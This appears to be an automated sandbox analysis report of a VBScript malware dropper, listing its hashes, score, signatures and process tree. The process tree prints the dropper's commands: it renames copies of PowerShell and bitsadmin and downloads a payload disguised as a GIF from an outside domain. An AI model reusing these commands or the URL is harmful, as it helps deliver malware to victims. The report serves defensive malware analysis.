Analysis

  • max time kernel
    123s
  • max time network
    125s
  • platform
    windows10_x64
  • resource
    win10
  • submitted
    14-09-2020 12:13

General

  • Target

    Allegato_doc_BRNLSN65H44H501N.vbs

  • Size

    3KB

  • MD5

    399426adfd02de2e27ebca41608be96e

  • SHA1

    7b7629618e0cf7d4826b6c8c6dceea344233df3b

  • SHA256

    a1bfd39eb6057b5797ca04c30d5ca65641585e72ecdfdd8e0c1ac24d126b4056

  • SHA512

    68db9c58318ddab4dcfee56d08a49bf6cf494a095b1d3a0972ca3ac2167caa063abb5a41e90ba2ed2142cccc19cb7063434503d5d4e95c8141d3145b480a47cd

Score
8/10

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Allegato_doc_BRNLSN65H44H501N.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2896
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\znUpPg.exe
      2⤵
        PID:2684
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\bitsadmin.exe C:\Users\Admin\AppData\Roaming\nUpPg.exe
        2⤵
          PID:560
        • C:\Users\Admin\AppData\Roaming\nUpPg.exe
          "C:\Users\Admin\AppData\Roaming\nUpPg.exe" /transfer AbVPtb /download https://innerearthartistry.com/nerea/BRNLSN65H44H501N/1x1.gif C:\Users\Admin\AppData\Roaming\1x1.gif
          2⤵
          • Executes dropped EXE
          PID:800

      Network

      MITRE ATT&CK Matrix

      Replay Monitor

      Loading Replay Monitor...

      Downloads